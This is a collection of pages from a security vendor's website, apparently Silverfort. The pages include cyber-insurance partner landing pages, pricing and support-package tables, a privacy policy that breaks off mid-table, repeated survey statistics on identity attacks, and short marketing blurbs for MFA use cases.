Learn more about our platform --- - Published: 2023-11-29 - Modified: 2024-09-13 - URL: https://www.silverfort.com/silverfort-for-smb-customers/ Welcome Cyber Insurance Clients! Silverfort stops identity threats such as account takeover, lateral movement and ransomware spread. The key is speed. Deploy quickly and easily in time for your cyber insurance renewal. Qualify for a special cyber insurance bundle partner price by filling out the form below. Check Eligibility Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn't be protected before 02 Securing Service Accounts Gain full visibility into your service accounts' inventory, activity, and behavior, and apply auto-created access policies to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn't rely on agents or proxies, with no code changes required, ensures the solution gets fully deployed in mere days Fill in the form below to ensure your broker has access to our exclusive special cyber insurance bundle price.
--- - Published: 2023-11-20 - Modified: 2025-05-05 - URL: https://www.silverfort.com/site-map/ Silverfort Site Map
- Company: About Us, News and Press, Careers, Contact Us, Investors
- Platform: The Silverfort Platform, Pricing
- Partners: Microsoft Partner Page, Technology Partners, Channel Partners, Cyber Insurance Partners, Partners Portal
- Customer Success: Support, Silverfort Academy, Documentation Center
- Use Cases: Agentless MFA, Cyber Insurance Compliance, Securing Service Accounts, Ransomware Protection, Privileged Access Management, Identity Zero Trust, Hybrid IAM Consolidation, Lateral Movement Prevention, Risk-Based Authentication, Visibility & Risk Analysis
- Resources: Blog, Case Studies, eBooks, Glossary, Reports, Solution Briefs, Tools, Videos, Webinars, White Papers
- MFA Everywhere: MFA for Active Directory, MFA for AWS CLI, MFA for AWS Workspaces, MFA for Azure, MFA for B2B, MFA for Banking, MFA for Business, MFA for Critical Assets, MFA for Cyber Insurance, MFA for Desktop, MFA for Domain Admin Accounts, MFA for FortiClient VPN, MFA for Healthcare, MFA for HR Systems, MFA for Jenkins, MFA for Jira, MFA for Juniper, MFA for Legacy Applications, MFA for Linux, MFA for Meraki VPN, MFA for Network Devices, MFA for Office 365, MFA for On-Premise Active Directory, MFA for On-premises Applications, MFA for Palo Alto VPN, MFA for PowerShell, MFA for Privileged Accounts, MFA for PsExec, MFA for RDP, MFA for RDP Azure, MFA for RDP Okta, MFA for Remote Access, MFA for Remote Desktop Gateway, MFA for Servers, MFA for Service Accounts, MFA for Shared Accounts, MFA for Teams, MFA for User Interface Logins, MFA for vCenter, MFA for VDI, MFA for VMware, MFA for VPN, MFA for Web Applications, MFA for Windows, MFA for Windows 10, MFA for Windows 11, MFA for Windows Server, MFA for Windows Server Login
- Identity Protection for Education, Identity Protection for Healthcare, Identity Protection for Financial Services, Identity Protection for Manufacturing, Identity Protection for Oil & Gas, Identity Protection for Telecommunications, Identity Protection for Retail
- Legal: Terms of Use, Privacy Policy, Data Privacy Framework

--- - Published: 2023-10-30 -
Modified: 2024-09-13 - URL: https://www.silverfort.com/silverfort-for-rt-specialty-customers/ Welcome RT Specialty Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries' attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn't be protected before 02 Securing Service Accounts Gain full visibility into your service accounts' inventory, activity, and behavior, and apply auto-created access policies to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn't rely on agents or proxies, with no code changes required, ensures the solution gets fully deployed in mere days Fill in the form below to gain insight into your environment's security posture with Silverfort's free Identity Security Assessment. --- - Published: 2023-10-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-insurance-requirements-de/ Everyone knows the value of cyber insurance. Meeting the growing requirements of cyber insurers is challenging. Rising ransomware attacks demand MFA on resources that conventional MFA architectures cannot protect. Silverfort helps you address these requirements in substance. This eBook explains: Which types of MFA are required for cyber liability insurance
How to evaluate cyber insurance solutions How to meet MFA insurance requirements with minimal disruption to your network operations --- - Published: 2023-10-27 - Modified: 2025-03-26 - URL: https://www.silverfort.com/customer-success/ Customer success and support Committed to helping you. Throughout your journey with us, our expert Customer Success team will be your trusted advisors, so you can get the most out of Silverfort. Browse customer resources or Check out our Success packages Get support now Go to support portal Browse our customer resources. Academy Your guide through every step of your journey with us. Community Access exclusive customer forums, webinars, and product updates. Trust Center Our one-stop third-party diligence and risk management site. Documentation Quick access to all technical documentation. Silverfort Academy Discover Silverfort on your own timeline through our exclusive Academy. Designed to guide you through every step of your journey with us, from onboarding to leveling up your identity protection, you can browse customer workshops, how-to videos, and much more. Included in the Academy is our free-of-charge Silverfort Certification Program, which covers a tailored learning path through self-paced courses, interactive hands-on labs, and dynamic live training sessions conducted by Silverfort experts. Go to Silverfort Academy Silverfort Community Get to know other Silverfort customers by joining our community. The community includes exclusive customer forums, product updates, webinars, and specialty groups, and it's open to ALL Silverfort customers! Join our community Trust center We are committed to absolute transparency in helping our customers assess the risks associated with our company and product. Silverfort Trust Center is the one-stop third-party diligence and risk management site for customers and prospective buyers of Silverfort.
This portal includes many key artifacts, including audit reports and certifications along with pre-filled SIG and CAIQ questionnaires for your consumption. Contact our security and risk management team if you have any questions. Learn more Documentation center Access all technical documentation, including release notes, product notes, technical specs and more, through our Documentation Center. All registered Silverfort users can access the center by logging in via the button below. If you are an existing customer and do not have access to the documentation center, please contact cs@silverfort.com or support@silverfort.com for assistance. Go to Documentation Center Your success is our success Our success packages are tailored to meet the complexities of your environment and the business and technical outcomes that matter to you.

| Features | Standard | Premium | Diamond* |
|---|---|---|---|
| Onboarding | | | |
| Kickoff call | | | |
| Sizing & Architecture | | | |
| Deployment | 2 use cases | Personalized | Personalized |
| Training | Silverfort Academy | Silverfort Academy | Silverfort Academy & Custom Training |
| Business Outcome Alignment | Once during onboarding | Semi-Annual | Quarterly |
| Support | | | |
| Coverage | Standard Business Hours (P1 24×7) | Standard Business Hours (P1 24×7) | Standard Business Hours (P1 24×7) |
| Support Method | Email, online | Email, phone, online | Email, phone, online |
| Priority Case Assignment | | | |
| Support Portal (Knowledge Base, Case Submissions) | | | |
| P1 Response Time (24×7) | 2hr | 2hr | 1hr |
| P2 Response Time | 10hr | 8hr | 6hr |
| P3 Response Time | 2 days | 24hr | 12hr |
| P4 Response Time | 5 days | 3 days | 24hr |
| Account Resources | | | |
| Customer Success Services | Shared Resource | Named Customer Success Manager | Named Customer Success Manager |
| Technical Resource | Shared Resource | Named Customer Solutions Specialist | Named Customer Solutions Specialist |
| Engagement with Success Manager | | Every other week | Weekly |
| Account Services | | | |
| Exclusive Enhancements | | | |
| Customized Workshops: policies, service accounts, reporting | | | |
| Annual Health Check | | | |
| Operational & Maintenance Communication | | | |
| Business Review | | Semi-annual | Quarterly |
| Product Roadmap Sessions | Cohort webinars | Yearly | Yearly |
| Threat Hunting | Add-on | Add-on | Add-on |

*Premium & Diamond Services – delivered via Silverfort only

--- - Published: 2023-10-26 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-insurance-requirements-fr/ Everyone knows the value of cyber insurance, but achieving compliance often remains tricky. As ransomware attacks increase worldwide, it becomes harder and harder to extend MFA coverage to the growing list of enterprise resources that insurers demand. We are here to help you understand what you will need. This eBook explains: Which types of MFA cyber insurers require How to evaluate the different solutions for achieving compliance How to comply with MFA requirements while limiting disruption to your network --- - Published: 2023-10-02 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-de/ The first comprehensive study on identity threat resilience: why organizations are unable to protect themselves against account takeover, lateral movement and ransomware attacks. 83% of organizations have experienced a security breach in which credentials were compromised. Only 5.7% of organizations have full visibility into their service accounts. 89.8% of organizations fail to fully integrate their PAM (Privileged Access Management) solution. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-09-20 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-fr/ Study on resilience against identity threats: why companies fail to protect themselves against account compromise, lateral movement and ransomware attacks.
83% of them have already suffered a breach involving compromised credentials. Only 5.7% of organizations have full visibility into their service accounts. 89.8% of companies fail to fully implement their PAM solutions. Only 22% of companies are able to prevent malicious access to their service accounts. --- - Published: 2023-09-06 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-2023/ The first comprehensive study on identity threat resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5.7% of organizations have full visibility into their service accounts. 89.8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-09-06 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-thn-cont-art/ The first comprehensive study on identity threat resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5.7% of organizations have full visibility into their service accounts. 89.8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-09-06 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-the-identity-attack-surface/ The first comprehensive study on identity threat resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks.
83% of organizations have experienced a security breach involving compromised credentials. Only 5.7% of organizations have full visibility into their service accounts. 89.8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-09-05 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-secweek/ The first comprehensive study on identity threat resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5.7% of organizations have full visibility into their service accounts. 89.8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-08-31 - Modified: 2025-08-18 - URL: https://www.silverfort.com/pricing/ Silverfort Pricing Our pricing is based on the size of your organization. Choose between four packages depending on where your business is on its identity security journey. All packages include Silverfort's patented Runtime Access Protection for preemptive security controls and Identity Inventory for end-to-end identity observability across your entire identity fabric.
Get a quote today
- Core includes: Identity Security Posture Management (ISPM): map the identity attack surface; find and fix security exposures. Universal MFA: extend MFA to IT/OT infrastructure, command-line tools, legacy systems and more. Get a quote
- Plus: everything in Core, and: Service Account Visibility: discover all service accounts; map how and where they are used. Service Account Protection: enforce virtual fencing policies; prevent unauthorized access; integrate with other IT tools to manage lifecycle automatically. Get a quote
- Advanced: everything in Plus, and: Authentication Firewall: prevent lateral movement; identity-based segmentation; Zero Trust access control. Identity Threat Detection & Response (ITDR): detect identity threats in real time; automated inline response; integrate with XDR and SIEM. Get a quote
- Enterprise: everything in Advanced, and: Access Analysis: enable least privilege at scale; understand which users access which resources. Privileged Access Security (PAS): privileged account discovery; virtual fencing and access control; Just-In-Time (JIT) access. Get a quote

Compare our packages SILVERFORT A LA CARTE Build your own package Browse our individual platform capabilities to customize your package.
Browse our catalog Compare our pricing packages Scroll sideways Core Plus Advanced Enterprise The Silverfort Platform and standard support services Identity Security Posture Management (ISPM) Uncover, map and analyze identity security exposures Universal Multi-Factor Authentication (MFA) Enable MFA for any resource, including 'unprotectable' systems Service Account Visibility Discover and analyse every service account, even unknowns Service Account Protection Restrict service account access to their intended purpose only Authentication Firewall Boost your resilience with identity-based Zero Trust policies Identity Threat Detection & Response (ITDR) Detect and respond to attacks in real time Access Analysis Understand which users access which resources, at scale Privileged Access Security (PAS) Secure your privileged accounts—in a few clicks Cloud Non-Human Identity (NHI) Security Find, monitor, and secure every cloud-based NHI Implementation & Support Services Standard Included Premier 10% to license cost Diamond 20% to license cost Silverfort Expert Services Identity Security Services (threat hunting & incident response), Silverfort Resident Expert (staff augmentation) and more. Available upon request from Silverfort or selected partners. Get a personalized quote Complete this form and a member of our team will be in touch to discuss --- - Published: 2023-08-15 - Modified: 2025-08-21 - URL: https://www.silverfort.com/privacy-policy/ Last Updated: September 2024 This privacy policy (“Privacy Policy”) governs how we, Silverfort, Inc. and its subsidiaries (“Silverfort” “we”, “our” or “us”) use, collect and store information pertaining to you (“User”, “you”) such as in the following use cases: (i) When you browse or visit our website, https://www. silverfort. com (“Website”)(ii) When you make use of, or interact with, our Website a. When you request a demo / schedule a demo b. When you contact us (e. g. , to request more information, to make an appointment with us) c. 
When we process your job application d. When you subscribe to email updates e. When you request to become a partner f. When you log into the partner portal g. When you contact us for support purposes (including, when you access the support platform of Silverfort)(iii) When you use Silverfort Authentication platform (“Platform”) a. When you sign up for an account, log in and/or purchase our services b. When you create administrators for your use of the Platform c. When your administrator user create users for your use of the Platform(iv) When you attend a marketing event and/or we exchange business cards and you provide us with your Personal Data(v) When we acquire your Personal Data from third-party sources (such as lead-generation companies) (vi) When we use the Personal Data of our resellers, distributors, agents and/or finders(vii) When you become our customer(viii) When you become our supplier(ix) When you interact with us on our social media profiles (e. g. , Facebook, Instagram, Twitter, LinkedIn) The Website and the App are individually and collectively referred to herein as the “Services”. We greatly respect your privacy, which is why we make every effort to provide a platform that would live up to the highest of user privacy standards. Please read this Privacy Policy carefully, so you can fully understand our practices in relation to Personal Data. “Personal Data” or “Personal Information” means any information that can be used, alone or together with other data, to uniquely identify any living human being. Please note that this is a master privacy policy and some of its provisions only apply to individuals in certain jurisdictions. For example, the legal basis in the table below is only relevant for GDPR-protected individuals. Important note: Nothing in this Privacy Policy is intended to limit in any way your statutory right, including your rights to a remedy or means of enforcement. 
Table of contents:

- What information we collect, why we collect it, and how it is used
- How we protect and store your Personal Data
- How we share your Personal Data
- Additional information regarding transfers of Personal Data
- Your privacy rights
- How to delete your account
- Use by children
- Links to and interaction with third party products
- Log files
- Analytic tools
- California Privacy Rights
- Our California do not track notice
- Deletion of content from California residents
- How to contact us

This Privacy Policy can be updated from time to time and therefore we ask you to check back periodically for the latest version of the Privacy Policy, as indicated below. If there will be any significant changes made to the use of your Personal Data in a manner different from that stated at the time of collection, we will notify you by posting a notice on our Website or by other means.

WHAT INFORMATION WE COLLECT, WHY WE COLLECT IT, AND HOW IT IS USED

| Use case | Personal Data we collect | Why is the Personal Data collected and for what purposes? | Legal basis (GDPR only, if applicable) | Third parties with whom we share your Personal Data | Consequences of not providing the Personal Data |
|---|---|---|---|---|---|
| When you browse or visit our website | Cookies, analytic tools and log files. For more information, please see our cookie policy (https://www.silverfort.com/company/cookies-policy/) | Marketing, analytics, analysis, market research, to improve our website | Consent; Legitimate interest (e.g., essential cookies) | For more information, please see our cookie policy (https://www.silverfort.com/company/cookies-policy/) | Cannot collect and store the information; Cannot use or access some parts of the website |
| When you make use of, or interact with, our Website | | | | | |
| When you request a demo / schedule a demo | Full name; Email Address; Job title; Company name; Phone number; Country & State; Message; Any other information that you decide to provide/supply us | To schedule a demo; To send you more information about Silverfort | Performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract; Legitimate interest (e.g. to provide a demo) | 3rd party platforms, such as for the following purposes: Salesforce.com (CRM); HubSpot (marketing communications); Microsoft O365 (email service); Salesloft (customer engagement tool); AWS Redshift (analytic insights) | Cannot send you more information about Silverfort; Cannot schedule a demo; Cannot respond to your query |
| | Full name; Email Address | To send marketing communications | Consent | 3rd party platforms, such as for the following purposes: Salesforce.com (CRM); HubSpot (marketing communications); Microsoft O365 (email service) | Cannot send you marketing communications |
| When you contact us (e.g., to request more information, to make an appointment with us) | Full name; Email Address; Job title; Company name; Phone number; Country & State; Information regarding how we can help you; Message; Any other information that you decide to provide/supply us | To process and answer questions; To provide support (e.g., to solve problems, bugs or issues); To customize your experience | Performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract; Legitimate interest (e.g. to respond to your request) | 3rd party platforms, such as for the following purposes: Salesforce.com (CRM); HubSpot (marketing communications); Microsoft O365 (email service); Salesloft (customer engagement tool) | Cannot assist you and respond to your query; Cannot provide support; Cannot customize your experience |
| | Full name; Email Address | To send marketing communications | Consent | 3rd party platforms, such as for the following purposes: Salesforce.com (CRM); HubSpot (marketing communications); Microsoft O365 (email service) | Cannot send marketing communications |
| When we have audio calls | Call recordings | Internal call analytics and internal educational purposes | Depending on the context, consent or legitimate interest | 3rd party platform: Gong (customer call recordings and analytics) | Cannot perform internal call analytics and limited internal education |
| When we process your job application | Full name; Email Address; Phone number; Resume/CV; LinkedIn profile; Any other information that you decide to provide/supply us | To process your job application; To assess the candidate. Note: For the avoidance of doubt, this use case shall apply to the CVs submitted by the Website or by any other methods (e.g., HR and recruitment agencies) | Performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract; Legitimate interest (e.g. to assess a candidate) | 3rd party platforms, such as for the following purposes: Comeet (job applicant tracking system); Box.com (storage); Microsoft O365 (email service) | Cannot process your job application; Cannot assess your suitability as a candidate |
| When you subscribe to email updates | Email Address | To send you more information about Silverfort and marketing communications | Consent; Legitimate interest (e.g. to send you marketing communications about Silverfort) | 3rd party platforms, such as for the following purposes: Salesforce.com (CRM); HubSpot (marketing communications); Microsoft O365 (email service) | Cannot send you marketing communications |
| When you request to become a partner | Full name; Job title; Company name; Email Address; Phone number; Country; Message; Any other information that you choose to share with us | To assess you as a partner; To analyze your profile; To contact you with information about becoming a Silverfort partner | Performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract; Legitimate interest (e.g. to assess a partner) | 3rd party platforms, such as for the following purposes: Salesforce.com (CRM); HubSpot (marketing communications); Microsoft O365 (email service); Salesloft (customer engagement tool); Docusign (digital signing tool) | Cannot assess you as a partner; Cannot analyze your profile; Cannot send you more information about becoming a partner |
| When you log into the partner portal | User; Password | To log in to the partner’s portal; To access the partner knowledge base; To register deals with Silverfort | Processing is necessary for the performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract; Legitimate interest (e.g. to log in to the portal) | 3rd party platforms, such as for the following purposes: Salesforce.com (CRM); ZenDesk (technical support and knowledge base); Salesloft (customer engagement tool) | Cannot log in to the portal |
| When you contact us for support purposes (including when you access the support platform of Silverfort) | Full name; Email Address; Company name; Phone number; User and Password; Message/support problem; Any other information that you choose to share with us | To access the support platform; To open support tickets; To access the knowledge base and documentation | Processing is necessary for the performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract; Legitimate interest (e.g. to log in to the portal) | 3rd party platforms, such as for the following purposes: ZenDesk (technical support and knowledge base); when you call the support center, we use Voicenation (call center services for support); Slack (internal communications); Everafter AI Ltd. | Cannot access the support platform; Cannot open support tickets; Cannot access the knowledge base and documentation |
| When you use the Silverfort Platform | | | | | |
| When you sign up for an account, log in and/or purchase our services | Full name; Business Email Address; Password; Usage pattern (logs from the use of the Platform); IP address; Any other information that the user may keep as part of the login process, to the extent that it includes Personal Data | To provide access to our Platform; To create an account; To make the Platform features available to you; To fulfill your requests for products and/or services and for related activities (e.g., product and service, account management, support and to provide other services related to your relationship with); To perform/execute the agreement; To grant you access to the services (our Platform); To improve and customize user experience | Performance of a contract to which the data subject is party; Legitimate interest (e.g. to provide you with Silverfort's services) | 3rd party platforms, such as for the following purposes: Google Firebase (for mobile app operation); Microsoft Azure (cloud); Docusign (digital signing tool); Skytap (demo test environment); Snowflake, Inc. | Cannot provide access to our Platform; Cannot create an account; Cannot make the Platform features available to you; Cannot fulfill your requests for products and/or services and for related activities (e.g., product and service, account management, support and to provide other services related to your relationship with); Cannot perform/execute the agreement; Cannot grant you access to the services (our Platform); Cannot improve and customize user experience |
| When you create administrators for your use of the Platform | Full name; Business email address; Password; Usage pattern (logs from the use of the Platform); IP address; Any other information that the user may keep as part of the log-in process, to the extent that it includes Personal Data | To create administrator users for your use of the Platform; To perform/execute the agreement; To grant you and your admin users access to the services (our Platform); To manage your everyday business needs (e.g., administration) | Performance of a contract to which the data subject is party; Legitimate interest (e.g. to provide you with Silverfort's services) | 3rd party platforms, such as for the following purposes: Google Firebase (for mobile app operation); Microsoft Azure (cloud) | Cannot create administrator users for your use of the Platform; Cannot perform/execute the agreement; Cannot grant you and your admin users access to the services (our Platform); Cannot manage your everyday business needs (e.g., administration) |
| When your administrator user creates users for your use of the Platform | Full name; Business email address; Password; Usage pattern (logs from the use of the... | | | | |
--- - Published: 2023-08-10 - Modified: 2024-09-13 - URL: https://www.silverfort.com/silverfort-for-woodruff-sawyer-customers/ Welcome Woodruff Sawyer Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Real-Time Protection Against Identity Threats: 01 MFA Everywhere: enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before. 02 Securing Service Accounts: gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access policies to alert or block their access if they become compromised. 03 Rapid and Effortless Deployment: innovative technology that doesn’t rely on agents or proxies, with no code changes required, ensures the solution gets fully deployed in mere days. Gain insight into your environment’s security posture with Silverfort’s free Identity Security Assessment. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-active-directory/ Complete MFA protection for all Active Directory environments, eliminating the risk of compromised credentials and introducing identity protection and MFA for on-prem environments. Utilizing agentless and proxyless technology, Silverfort analyzes every Active Directory authentication request and, if there is a need, pushes an MFA notification to the requesting user. Only after successful verification does Silverfort instruct Active Directory to let the user access the requested resource.
This process is completely agnostic to the access method – Silverfort makes MFA for Active Directory accessible, comprehensive and easy to deploy, making your organization resilient to cyberattacks as never before. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-on-premise-active-directory/ Strengthen Your On-Premise AD with Stronger MFA Security—Powered by Silverfort. Silverfort is the ideal solution for MFA for On-Premise Active Directory. With its innovative platform, Silverfort removes the need for user interaction during the authentication process, providing complete protection against account takeover and unauthorized access. The AI-driven solution seamlessly integrates with your existing security infrastructure, so that you can easily implement On-prem MFA for Active Directory without any disruption. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-service-accounts/ Unleash the Power of Multi-Factor Authentication for Every Service Account with Silverfort. Silverfort’s agentless MFA platform provides adaptive authentication and visibility into sensitive company systems and resources. It protects data from unauthorized access with multi-factor authentication (MFA) and eliminates the risk of service account compromise. As the first in the market with an agentless solution for MFA for service accounts, Silverfort is the perfect choice for organizations looking for an easy-to-use and secure way to manage their sensitive systems. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows/ Secure Windows access with Silverfort’s hassle-free MFA solution. Silverfort is the ideal solution for ensuring secure and hassle-free access to Windows applications.
Our cutting-edge MFA technology allows you to effortlessly enable MFA for Windows, eliminating the risk of cyber attacks such as brute force and password guessing. With Silverfort, your organization can implement MFA across all Windows applications, while still maintaining optimal user experience and productivity. Our innovative solution integrates seamlessly with your existing infrastructure, providing unparalleled protection and reliability. Partner with Silverfort today and experience the future of MFA for Windows! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows-10/ Experience effortless MFA protection for your Windows 10 devices with Silverfort. Silverfort is a leading provider of Multi-Factor Authentication (MFA) solutions that protect organizations from modern security threats. Our advanced technology offers comprehensive MFA for Windows 10 that is easy to deploy across all systems and applications. With Silverfort, you can enjoy the benefits of MFA without the hassle of user interruption, password weaknesses or token abuse. Our adaptive risk-based MFA provides users with a seamless experience, while securing their sensitive data and confidential information. Try Silverfort today for a next-generation MFA experience that’s guaranteed to keep you safe. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows-11/ Secure your Windows 11 journey with effortless MFA – powered by Silverfort. Silverfort is the ultimate solution for multi-factor authentication for Windows 11. It eliminates the vulnerabilities of traditional MFA and ensures that only authorized users can access critical resources. Silverfort’s unique platform uses adaptive risk analysis and AI-powered authentication to provide seamless access controls across hybrid and highly distributed environments.
With Silverfort, enterprises can achieve complete visibility and control over access management while boosting security, compliance, and user experience. Sign up today and experience the Silverfort difference. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows-server-login/ Secure your Windows Server Login with ease using Silverfort’s advanced MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows-server/ Secure your Windows Server with ease, with Silverfort’s adaptive MFA solution. Silverfort offers a powerful solution for secure multi-factor authentication (MFA) for Windows Server. Our innovative platform enables organizations to easily and efficiently implement MFA, reducing the risk of unauthorized access and protecting sensitive data. With Silverfort’s cutting-edge technology, you can ensure that only authorized users can access your Windows Server, while our advanced risk analytics and anomaly detection features provide additional protection against cyber threats targeting areas such as NTLM vulnerabilities and Certifried attacks. Discover how Silverfort can help strengthen your security posture and protect your critical assets today. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-rdp/ Safeguard sensitive data and systems accessible via RDP with MFA. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-rdp-azure/ Fortify your Azure defenses with Silverfort’s end-to-end agentless MFA solution for RDP. Silverfort is the leading provider of comprehensive MFA solutions that can easily be applied to any platform. We understand the importance of secure remote access to cloud environments, which is why we offer an MFA solution tailored specifically for RDP on Azure.
For organizations utilizing Azure for cloud services, incorporating MFA into Azure’s RDP sessions is a key security measure. By integrating Silverfort’s MFA with Azure RDP, an extra layer of security is added. Users attempting to access RDP sessions hosted on Azure are required to authenticate through Silverfort’s MFA system. This ensures enhanced security in the cloud environment, providing a safeguard against unauthorized access and potential breaches. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-azure/ Secure Your Azure Cloud with Silverfort’s Advanced MFA Solution – Protecting Your Organization’s Data and Resources. Silverfort is a multi-factor authentication (MFA) solution for Azure that provides comprehensive protection for identities, assets, and applications. With Silverfort, you can secure access to sensitive data and applications from unauthorized access, including phishing and other sophisticated cyber-attacks. Silverfort supports a wide range of authentication methods, including biometrics, smart cards, and token-based authenticators. It seamlessly integrates with Azure Active Directory to provide smooth and secure access to all Azure resources. Whether you’re managing dozens or thousands of identities, Silverfort ensures your organization remains secure, compliant, and efficient while improving productivity and reducing costs. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-remote-desktop-gateway/ Secure remote access made easy with Silverfort’s MFA solution for Remote Desktop Gateway. 
--- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-rdp-okta/ Increase your network’s resilience and secure your RDP access with Silverfort’s agentless MFA solution --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-domain-admin-accounts/ Securing your organization’s crown jewels with Silverfort – Unbeatable Multi-Factor Authentication for Domain Admin Accounts --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-privileged-accounts/ Unlock the power of privileged accounts with uncompromising security – Silverfort’s MFA solution has got you covered. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-on-premises-applications/ Protect your on-premises apps with ease – Silverfort’s seamless MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-banking/ Protect your sensitive banking resources with Silverfort’s MFA solution. Silverfort enables banking firms to implement secure access to their banking infrastructure with unprecedented accuracy and efficiency. Our solution takes care of all your MFA needs – from device-based authentication to biometric authentication. With Silverfort, you can provide your customers with a seamless and secure banking experience, while safeguarding their personal and financial information from cyber attackers. Get in touch with us today to learn more! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-legacy-applications/ Secure your legacy applications with Silverfort: multi-factor authentication made simple. Silverfort enables companies to enhance their security posture without requiring any changes to the existing infrastructure or moving data to the cloud.
The solution is simple to deploy, highly scalable, and provides end-to-end protection to users accessing legacy systems, ensuring that only authorized personnel can access critical applications and data. With Silverfort, companies can add an extra layer of security to their legacy systems, making them less vulnerable to cyber attacks and ensuring compliance with regulatory requirements. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-powershell/ Secure and streamline your PowerShell environment with Silverfort’s seamless MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-psexec/ Strengthen your defenses with Silverfort’s MFA solution for secure PsExec. Silverfort provides a unique and innovative solution for MFA for PsExec, enabling customers to secure their environment and prevent unauthorized access. With Silverfort, customers can easily implement multi-factor authentication for any PsExec session, without the need for agents or proxies. Silverfort uses AI-driven risk-based adaptive authentication and delivers a seamless user experience and unparalleled coverage. By deploying Silverfort, customers can enhance their security posture, meet compliance requirements, and gain wider visibility and control over their environment. Sign up now and experience the benefits of Silverfort’s MFA for PsExec solution! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-desktop/ Simplify security with Silverfort: Robust MFA for Desktop and Cloud, no agents required. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-office-365/ Fortifying Office 365’s Security: One Step at a Time with Silverfort’s MFA Solution.
